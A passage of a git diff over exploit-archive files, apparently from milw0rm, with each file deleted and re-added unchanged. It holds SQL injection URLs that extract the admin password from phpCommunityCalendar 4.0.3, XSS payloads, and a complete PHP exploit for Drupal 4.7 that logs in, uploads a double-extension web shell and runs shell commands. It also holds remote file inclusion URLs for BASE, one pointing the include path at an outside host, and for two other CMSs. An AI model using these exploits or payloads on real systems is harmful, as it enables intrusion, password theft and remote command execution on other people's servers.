-http://[SERVER]/[PATH]/day.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/* - -http://[SERVER]/[PATH]/event.php?ID=(1=1) [SQL] - -http://[SERVER]/[PATH]/admin/delCalendar.php?CalendarDetailsID=x'[SQL] - -http://[SERVER]/[PATH]/admin/delAdmin.php?AdminUserID=x' [SQL] - -http://[SERVER]/[PATH]/admin/delAddress.php?EventLocationID=x' [SQL] - -http://[SERVER]/[PATH]/admin/delCategory.php?LocationID=x' [SQL] - -# milw0rm.com [2006-05-23] +################################################################################## +#<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<# +################################################################################## +# # +# 
phpCommunityCalendar 4.0.3 Multiple Vulnerabilites # +# # +################################################################################## +#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>># +################################################################################## +# # +# author : X0r_1 # +# release : 23.05.06 # +# software : http://www.appideas.com/ # +# googledork : "Calendar programming by AppIdeas.com" filetype:php # +# # +################################################################################## + +XSS: + +http://[SERVER]/[PATH]/week.php?LoName=<script>alert('XSS')</script> + +http://[SERVER]/[PATH]/month.php?LoName=<script>alert('XSS')</script> + +http://[SERVER]/[PATH]/event.php?AddressLink="><script>alert('XSS')</script><" + + +SQL Injections: + +http://[SERVER]/[PATH]/month.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/* + +http://[SERVER]/[PATH]/day.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/* + +http://[SERVER]/[PATH]/event.php?ID=(1=1) [SQL] + +http://[SERVER]/[PATH]/admin/delCalendar.php?CalendarDetailsID=x'[SQL] + +http://[SERVER]/[PATH]/admin/delAdmin.php?AdminUserID=x' [SQL] + +http://[SERVER]/[PATH]/admin/delAddress.php?EventLocationID=x' [SQL] + +http://[SERVER]/[PATH]/admin/delCategory.php?LocationID=x' [SQL] + +# milw0rm.com [2006-05-23] diff --git a/platforms/php/webapps/1821.php b/platforms/php/webapps/1821.php index a2fd78e7e..7c222554f 100755 --- a/platforms/php/webapps/1821.php +++ b/platforms/php/webapps/1821.php 
@@ -1,393 +1,393 @@ -#!/usr/bin/php -q -d short_open_tag=on -<? -echo "Drupal <= 4.7 attachment mod_mime poc exploit\r\n"; -echo "by rgod rgod@autistici.org\r\n"; -echo "site: http://retrogod.altervista.org\r\n\r\n"; - -/* -this works with a user account with upload rights and with permissions to modify -stories, however this is only a poc, you can do the same uploading an attachment, -like this, with double extension, through all modules: - -attach.php.pps - -with this content: -*/ - -$shell= -'<?php -if (get_magic_quotes_gpc()){$_GET[cmd]=stripslashes($_GET[cmd]);} -ini_set("max_execution_time",0); -echo chr(0x2A).chr(0x64).chr(0x65).chr(0x6C).chr(0x69).chr(0x2A); -passthru($_GET[cmd]); -echo chr(0x2A).chr(0x64).chr(0x65).chr(0x6C).chr(0x69).chr(0x2A); -?>'; - -/* -then: - -http://[target]/[path]/files/attach.php.pps?cmd=ls%20-la - -also, I noticed that from an admin account you can upload .php3 or .php5 files -*/ - -if ($argc<6) { -echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to Drupal\r\n"; -echo "user-pass: valid credentials with upload rights\r\n"; -echo "cmd: a shell command\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." localhost /drupal/ user password cat ./../sites/default/settings.php\r\n"; -echo "php ".$argv[0]." localhost /drupal/ user password ls -la -p81\r\n"; -echo "php ".$argv[0]." 
localhost / user password ls -la -P1.1.1.1:80\r\n"; -die; -} - -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -function make_seed() -{ - list($usec, $sec) = explode(' ', microtime()); - return (float) $sec + ((float) $usec * 100000); -} - -$host=$argv[1]; -$path=$argv[2]; -$user=$argv[3]; -$pass=$argv[4]; -$cmd="";$port=80;$proxy=""; - -for ($i=5; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -srand(make_seed()); -$anumber = rand(1,99999); - - $data ="edit%5Bname%5D=".$user; - $data.="&edit%5Bpass%5D=".$pass; - $data.="&edit%5Bform_id%5D=user_login"; - $data.="&op=Log%20in"; - $packet="POST ".$path."?q=user/login&destination=node HTTP/1.0\r\n"; - $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; - $packet.="Accept-Encoding: gzip, deflate\r\n"; - $packet.="Accept-Language: it\r\n"; - $packet.="Referer: http://".$host.$path."\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Content-Length: ".strlen($data)."\r\n"; - $packet.="Cache-Control: no-cache\r\n"; - $packet.="Connection: close\r\n\r\n"; - $packet.=$data; -// echo quick_dump($packet); - sendpacketii($packet); - $temp=explode("Set-Cookie: ",$html); - $temp2=explode(" ",$temp[2]); - $cookie=$temp2[0]; - echo "\r\nCookie -> ".$cookie."\r\n\r\n"; - - -$ext= array(".php.jpg",".php.jpeg",".php.gif", 
".php.png",".php.txt",".php.html",".php.doc",".php.xls",".php.pdf",".php.ppt",".php.pps"); - -for ($x=0; $x<=count($ext)-1;$x++) -{ -echo "Trying with ".$ext[$x]." extension...\r\n"; -$d=date("Y-m-d"); -$data='-----------------------------7d6381c1b00a2 -Content-Disposition: form-data; name="edit[title]" - -titolo ------------------------------7d6381c1b00a2 -Content-Disposition: form-data; name="edit[body]" - -corpo ------------------------------7d6381c1b00a2 -Content-Disposition: form-data; name="edit[format]" - -1 ------------------------------7d6381c1b00a2 -Content-Disposition: form-data; name="edit[form_id]" - -story_node_form ------------------------------7d6381c1b00a2 -Content-Disposition: form-data; name="edit[name]" - -'.$user.' ------------------------------7d6381c1b00a2 -Content-Disposition: form-data; name="edit[date]" - -'.$d.' 23:59:59 +0000 ------------------------------7d6381c1b00a2 -Content-Disposition: form-data; name="edit[status]" - -1 ------------------------------7d6381c1b00a2 -Content-Disposition: form-data; name="edit[promote]" - -1 ------------------------------7d6381c1b00a2 -Content-Disposition: form-data; name="edit[comment]" - -2 ------------------------------7d6381c1b00a2 -Content-Disposition: form-data; name="edit[path]" - - ------------------------------7d6381c1b00a2 -Content-Disposition: form-data; name="edit[menu][title]" - - ------------------------------7d6381c1b00a2 -Content-Disposition: form-data; name="edit[menu][description]" - - ------------------------------7d6381c1b00a2 -Content-Disposition: form-data; name="edit[menu][pid]" - -1 ------------------------------7d6381c1b00a2 -Content-Disposition: form-data; name="edit[menu][path]" - - ------------------------------7d6381c1b00a2 -Content-Disposition: form-data; name="edit[menu][weight]" - -0 ------------------------------7d6381c1b00a2 -Content-Disposition: form-data; name="edit[menu][mid]" - -0 ------------------------------7d6381c1b00a2 -Content-Disposition: form-data; 
name="edit[menu][type]" - -86 ------------------------------7d6381c1b00a2 -Content-Disposition: form-data; name="edit[upload]"; filename="suntzu'.$anumber.$ext[$x].'" -Content-Type: image/jpeg - -'.$shell.' ------------------------------7d6381c1b00a2 -Content-Disposition: form-data; name="fileop" - -Attach ------------------------------7d6381c1b00a2 -Content-Disposition: form-data; name="edit[fileop]" - -http://'.$host.$path.'?q=upload/js ------------------------------7d6381c1b00a2 -Content-Disposition: form-data; name="edit[vid]" - - ------------------------------7d6381c1b00a2-- -'; - -$packet="POST ".$p."?q=upload/js HTTP/1.0\r\n"; -$packet.="Referer: http://".$host.$path."/?q=node/add/story\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6381c1b00a2\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Cache-Control: no-cache\r\n"; -$packet.="Cookie: ".$cookie."\r\n"; -$packet.="Connection: Keep-Alive\r\n\r\n"; -$packet.=$data; -//echo quick_dump($packet); -sendpacketii($packet); - -$data='-----------------------------7d6318101b00a2 -Content-Disposition: form-data; name="edit[title]" - -titolo ------------------------------7d6318101b00a2 -Content-Disposition: form-data; name="edit[body]" - -corpo ------------------------------7d6318101b00a2 -Content-Disposition: form-data; name="edit[format]" - -1 ------------------------------7d6318101b00a2 -Content-Disposition: form-data; name="edit[form_id]" - -story_node_form ------------------------------7d6318101b00a2 -Content-Disposition: form-data; name="edit[name]" - -'.$user.' ------------------------------7d6318101b00a2 -Content-Disposition: form-data; name="edit[date]" - -'.$d.' 
23:59:59 +0000 ------------------------------7d6318101b00a2 -Content-Disposition: form-data; name="edit[status]" - -1 ------------------------------7d6318101b00a2 -Content-Disposition: form-data; name="edit[promote]" - -1 ------------------------------7d6318101b00a2 -Content-Disposition: form-data; name="edit[comment]" - -2 ------------------------------7d6318101b00a2 -Content-Disposition: form-data; name="edit[path]" - - ------------------------------7d6318101b00a2 -Content-Disposition: form-data; name="edit[menu][title]" - - ------------------------------7d6318101b00a2 -Content-Disposition: form-data; name="edit[menu][description]" - - ------------------------------7d6318101b00a2 -Content-Disposition: form-data; name="edit[menu][pid]" - -1 ------------------------------7d6318101b00a2 -Content-Disposition: form-data; name="edit[menu][path]" - - ------------------------------7d6318101b00a2 -Content-Disposition: form-data; name="edit[menu][weight]" - -0 ------------------------------7d6318101b00a2 -Content-Disposition: form-data; name="edit[menu][mid]" - -0 ------------------------------7d6318101b00a2 -Content-Disposition: form-data; name="edit[menu][type]" - -86 ------------------------------7d6318101b00a2 -Content-Disposition: form-data; name="edit[files][upload_0][list]" - -1 ------------------------------7d6318101b00a2 -Content-Disposition: form-data; name="edit[files][upload_0][description]" - -hello.txt ------------------------------7d6318101b00a2 -Content-Disposition: form-data; name="edit[upload]"; filename="" -Content-Type: image/jpeg - - ------------------------------7d6318101b00a2 -Content-Disposition: form-data; name="edit[fileop]" - -http://'.$host.$path.'?q=upload/js ------------------------------7d6318101b00a2 -Content-Disposition: form-data; name="edit[vid]" - - ------------------------------7d6318101b00a2 -Content-Disposition: form-data; name="op" - -Submit ------------------------------7d6318101b00a2-- -'; - -$packet="POST ".$p."?q=node/add/story 
HTTP/1.0\r\n"; -$packet.="Referer: http://".$host.$path."/?q=node/add/story\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6318101b00a2\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cache-Control: no-cache\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Cookie: ".$cookie."\r\n"; -$packet.="Connection: Keep-Alive\r\n\r\n"; -$packet.=$data; -//echo quick_dump($packet); -sendpacketii($packet); - -$packet ="GET ".$p."files/suntzu".$anumber.$ext[$x]."?cmd=".$cmd." HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -//echo quick_dump($packet); -sendpacketii($packet); -if (strstr($html,"*deli*")) -{echo "Exploit succeeded...\r\n"; - $temp=explode("*deli*",$html); - die($temp[1]); -} -} -//if you are here... -echo "Exploit failed..."; -?> - -# milw0rm.com [2006-05-24] +#!/usr/bin/php -q -d short_open_tag=on +<? +echo "Drupal <= 4.7 attachment mod_mime poc exploit\r\n"; +echo "by rgod rgod@autistici.org\r\n"; +echo "site: http://retrogod.altervista.org\r\n\r\n"; + +/* +this works with a user account with upload rights and with permissions to modify +stories, however this is only a poc, you can do the same uploading an attachment, +like this, with double extension, through all modules: + +attach.php.pps + +with this content: +*/ + +$shell= +'<?php +if (get_magic_quotes_gpc()){$_GET[cmd]=stripslashes($_GET[cmd]);} +ini_set("max_execution_time",0); +echo chr(0x2A).chr(0x64).chr(0x65).chr(0x6C).chr(0x69).chr(0x2A); +passthru($_GET[cmd]); +echo chr(0x2A).chr(0x64).chr(0x65).chr(0x6C).chr(0x69).chr(0x2A); +?>'; + +/* +then: + +http://[target]/[path]/files/attach.php.pps?cmd=ls%20-la + +also, I noticed that from an admin account you can upload .php3 or .php5 files +*/ + +if ($argc<6) { +echo "Usage: php ".$argv[0]." 
host path user pass cmd OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to Drupal\r\n"; +echo "user-pass: valid credentials with upload rights\r\n"; +echo "cmd: a shell command\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." localhost /drupal/ user password cat ./../sites/default/settings.php\r\n"; +echo "php ".$argv[0]." localhost /drupal/ user password ls -la -p81\r\n"; +echo "php ".$argv[0]." localhost / user password ls -la -P1.1.1.1:80\r\n"; +die; +} + +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +function make_seed() +{ + list($usec, $sec) = explode(' ', microtime()); + return (float) $sec + ((float) $usec * 100000); +} + +$host=$argv[1]; +$path=$argv[2]; +$user=$argv[3]; +$pass=$argv[4]; +$cmd="";$port=80;$proxy=""; + +for ($i=5; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +srand(make_seed()); +$anumber = rand(1,99999); + + $data ="edit%5Bname%5D=".$user; + $data.="&edit%5Bpass%5D=".$pass; + $data.="&edit%5Bform_id%5D=user_login"; + $data.="&op=Log%20in"; + $packet="POST ".$path."?q=user/login&destination=node HTTP/1.0\r\n"; + $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; + $packet.="Accept-Encoding: gzip, deflate\r\n"; + $packet.="Accept-Language: it\r\n"; + $packet.="Referer: http://".$host.$path."\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Content-Length: ".strlen($data)."\r\n"; + $packet.="Cache-Control: no-cache\r\n"; + $packet.="Connection: close\r\n\r\n"; + $packet.=$data; +// echo quick_dump($packet); + sendpacketii($packet); + $temp=explode("Set-Cookie: ",$html); + $temp2=explode(" ",$temp[2]); + $cookie=$temp2[0]; + echo "\r\nCookie -> ".$cookie."\r\n\r\n"; + + +$ext= array(".php.jpg",".php.jpeg",".php.gif", 
".php.png",".php.txt",".php.html",".php.doc",".php.xls",".php.pdf",".php.ppt",".php.pps"); + +for ($x=0; $x<=count($ext)-1;$x++) +{ +echo "Trying with ".$ext[$x]." extension...\r\n"; +$d=date("Y-m-d"); +$data='-----------------------------7d6381c1b00a2 +Content-Disposition: form-data; name="edit[title]" + +titolo +-----------------------------7d6381c1b00a2 +Content-Disposition: form-data; name="edit[body]" + +corpo +-----------------------------7d6381c1b00a2 +Content-Disposition: form-data; name="edit[format]" + +1 +-----------------------------7d6381c1b00a2 +Content-Disposition: form-data; name="edit[form_id]" + +story_node_form +-----------------------------7d6381c1b00a2 +Content-Disposition: form-data; name="edit[name]" + +'.$user.' +-----------------------------7d6381c1b00a2 +Content-Disposition: form-data; name="edit[date]" + +'.$d.' 23:59:59 +0000 +-----------------------------7d6381c1b00a2 +Content-Disposition: form-data; name="edit[status]" + +1 +-----------------------------7d6381c1b00a2 +Content-Disposition: form-data; name="edit[promote]" + +1 +-----------------------------7d6381c1b00a2 +Content-Disposition: form-data; name="edit[comment]" + +2 +-----------------------------7d6381c1b00a2 +Content-Disposition: form-data; name="edit[path]" + + +-----------------------------7d6381c1b00a2 +Content-Disposition: form-data; name="edit[menu][title]" + + +-----------------------------7d6381c1b00a2 +Content-Disposition: form-data; name="edit[menu][description]" + + +-----------------------------7d6381c1b00a2 +Content-Disposition: form-data; name="edit[menu][pid]" + +1 +-----------------------------7d6381c1b00a2 +Content-Disposition: form-data; name="edit[menu][path]" + + +-----------------------------7d6381c1b00a2 +Content-Disposition: form-data; name="edit[menu][weight]" + +0 +-----------------------------7d6381c1b00a2 +Content-Disposition: form-data; name="edit[menu][mid]" + +0 +-----------------------------7d6381c1b00a2 +Content-Disposition: form-data; 
name="edit[menu][type]" + +86 +-----------------------------7d6381c1b00a2 +Content-Disposition: form-data; name="edit[upload]"; filename="suntzu'.$anumber.$ext[$x].'" +Content-Type: image/jpeg + +'.$shell.' +-----------------------------7d6381c1b00a2 +Content-Disposition: form-data; name="fileop" + +Attach +-----------------------------7d6381c1b00a2 +Content-Disposition: form-data; name="edit[fileop]" + +http://'.$host.$path.'?q=upload/js +-----------------------------7d6381c1b00a2 +Content-Disposition: form-data; name="edit[vid]" + + +-----------------------------7d6381c1b00a2-- +'; + +$packet="POST ".$p."?q=upload/js HTTP/1.0\r\n"; +$packet.="Referer: http://".$host.$path."/?q=node/add/story\r\n"; +$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6381c1b00a2\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Cache-Control: no-cache\r\n"; +$packet.="Cookie: ".$cookie."\r\n"; +$packet.="Connection: Keep-Alive\r\n\r\n"; +$packet.=$data; +//echo quick_dump($packet); +sendpacketii($packet); + +$data='-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="edit[title]" + +titolo +-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="edit[body]" + +corpo +-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="edit[format]" + +1 +-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="edit[form_id]" + +story_node_form +-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="edit[name]" + +'.$user.' +-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="edit[date]" + +'.$d.' 
23:59:59 +0000 +-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="edit[status]" + +1 +-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="edit[promote]" + +1 +-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="edit[comment]" + +2 +-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="edit[path]" + + +-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="edit[menu][title]" + + +-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="edit[menu][description]" + + +-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="edit[menu][pid]" + +1 +-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="edit[menu][path]" + + +-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="edit[menu][weight]" + +0 +-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="edit[menu][mid]" + +0 +-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="edit[menu][type]" + +86 +-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="edit[files][upload_0][list]" + +1 +-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="edit[files][upload_0][description]" + +hello.txt +-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="edit[upload]"; filename="" +Content-Type: image/jpeg + + +-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="edit[fileop]" + +http://'.$host.$path.'?q=upload/js +-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="edit[vid]" + + +-----------------------------7d6318101b00a2 +Content-Disposition: form-data; name="op" + +Submit +-----------------------------7d6318101b00a2-- +'; + +$packet="POST ".$p."?q=node/add/story 
HTTP/1.0\r\n"; +$packet.="Referer: http://".$host.$path."/?q=node/add/story\r\n"; +$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6318101b00a2\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Cache-Control: no-cache\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Cookie: ".$cookie."\r\n"; +$packet.="Connection: Keep-Alive\r\n\r\n"; +$packet.=$data; +//echo quick_dump($packet); +sendpacketii($packet); + +$packet ="GET ".$p."files/suntzu".$anumber.$ext[$x]."?cmd=".$cmd." HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +//echo quick_dump($packet); +sendpacketii($packet); +if (strstr($html,"*deli*")) +{echo "Exploit succeeded...\r\n"; + $temp=explode("*deli*",$html); + die($temp[1]); +} +} +//if you are here... +echo "Exploit failed..."; +?> + +# milw0rm.com [2006-05-24] diff --git a/platforms/php/webapps/1823.txt b/platforms/php/webapps/1823.txt index 6610d1a6d..194cd9a6b 100755 --- a/platforms/php/webapps/1823.txt +++ b/platforms/php/webapps/1823.txt 
@@ -1,32 +1,32 @@ -# Basic Analysis and Security Engine (BASE) <= 1.2.4 (melissa) Inclusion Vulnerabilities -# Just glanced over BASE for a pentesting job. /str0ke ! milw0rm.com -################################## - -[code (base_qry_common.php)] - include_once("$BASE_path/includes/base_signature.inc.php"); -[/code] - -http://[site]/snort/base_qry_common.php?BASE_path=http://www.milw0rm.com/index.php?& - -######################################## - -[code (base_stat_common.php)] - include_once("$BASE_path/includes/base_constants.inc.php"); -[/code] - -http://[site]/snort/base_stat_common.php?BASE_path=http://www.milw0rm.com/index.php?& - -############################################### - -[code (includes/base_include.inc.php)] - include_once("$BASE_path/includes/base_db.inc.php"); - include_once("$BASE_path/includes/base_output_html.inc.php"); - include_once("$BASE_path/includes/base_state_common.inc.php"); - ... -[/code] - -http://[site]/snort/includes/base_include.inc.php?BASE_path=http://www.milw0rm.com/index.php?& - -####################################################### - -# milw0rm.com [2006-05-25] +# Basic Analysis and Security Engine (BASE) <= 1.2.4 (melissa) Inclusion Vulnerabilities +# Just glanced over BASE for a pentesting job. /str0ke ! 
milw0rm.com +################################## + +[code (base_qry_common.php)] + include_once("$BASE_path/includes/base_signature.inc.php"); +[/code] + +http://[site]/snort/base_qry_common.php?BASE_path=http://www.milw0rm.com/index.php?& + +######################################## + +[code (base_stat_common.php)] + include_once("$BASE_path/includes/base_constants.inc.php"); +[/code] + +http://[site]/snort/base_stat_common.php?BASE_path=http://www.milw0rm.com/index.php?& + +############################################### + +[code (includes/base_include.inc.php)] + include_once("$BASE_path/includes/base_db.inc.php"); + include_once("$BASE_path/includes/base_output_html.inc.php"); + include_once("$BASE_path/includes/base_state_common.inc.php"); + ... +[/code] + +http://[site]/snort/includes/base_include.inc.php?BASE_path=http://www.milw0rm.com/index.php?& + +####################################################### + +# milw0rm.com [2006-05-25] diff --git a/platforms/php/webapps/1824.txt b/platforms/php/webapps/1824.txt index d3cf0f24a..03888d00f 100755 --- a/platforms/php/webapps/1824.txt +++ b/platforms/php/webapps/1824.txt 
@@ -1,32 +1,32 @@ -################ DEVIL TEAM THE BEST POLISH TEAM ################# -#open-medium (0.25) - Content Management System - Remote File Include Vulnerabilities -#Find by Kacper (Rahim). -#Greetings For ALL DEVIL TEAM members, Special DragonHeart :*** -#Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl -################################################################## -[code] -404.php: - -....... - -} else { -// templates verwenden -if -(!@include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys".$REDSYS["LanguagePath"]."/404.tmp")) -{ -include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys/404.tmp"); -} -} - -?> - -[/code] -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -http://www.site.com/[open-mediumCMS_path]/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=[evil_scripts] - - -################################################################### -#Elo ;-) - -# milw0rm.com [2006-05-25] +################ DEVIL TEAM THE BEST POLISH TEAM ################# +#open-medium (0.25) - Content Management System - Remote File Include Vulnerabilities +#Find by Kacper (Rahim). +#Greetings For ALL DEVIL TEAM members, Special DragonHeart :*** +#Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl +################################################################## +[code] +404.php: + +....... + +} else { +// templates verwenden +if +(!@include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys".$REDSYS["LanguagePath"]."/404.tmp")) +{ +include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys/404.tmp"); +} +} + +?> + +[/code] +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +http://www.site.com/[open-mediumCMS_path]/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=[evil_scripts] + + +################################################################### +#Elo ;-) + +# milw0rm.com [2006-05-25] diff --git a/platforms/php/webapps/1825.txt b/platforms/php/webapps/1825.txt index 5108b5dff..576272e34 100755 --- a/platforms/php/webapps/1825.txt 
+++ b/platforms/php/webapps/1825.txt @@ -1,33 +1,33 @@ -################# DEVIL TEAM THE BEST POLISH TEAM ################## -# -# Back-End CMS - Remote File Include Vulnerabilities -# Find by Kacper (Rahim). -# Greetings For ALL DEVIL TEAM members, Special DragonHeart :*** -# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl -# Site of script: http://www.back-end.org -# -#################################################################### -*/ - -BE_config.php Line 27-31: - -[code] -... - // Script timer - require_once($_PSL['classdir'] . '/BE_phpTimer.class'); - $scriptTimer = & pslSingleton('phpTimer'); - $scriptTimer->start('main'); - /* Use Example -... -[/code] - - -/* - -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -http://www.site.com/[Back-End_path]/BE_config.php?_PSL[classdir]=[evil_scripts] - -#Elo ;-) - -# milw0rm.com [2006-05-25] +################# DEVIL TEAM THE BEST POLISH TEAM ################## +# +# Back-End CMS - Remote File Include Vulnerabilities +# Find by Kacper (Rahim). +# Greetings For ALL DEVIL TEAM members, Special DragonHeart :*** +# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl +# Site of script: http://www.back-end.org +# +#################################################################### +*/ + +BE_config.php Line 27-31: + +[code] +... + // Script timer + require_once($_PSL['classdir'] . '/BE_phpTimer.class'); + $scriptTimer = & pslSingleton('phpTimer'); + $scriptTimer->start('main'); + /* Use Example +... +[/code] + + +/* + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + 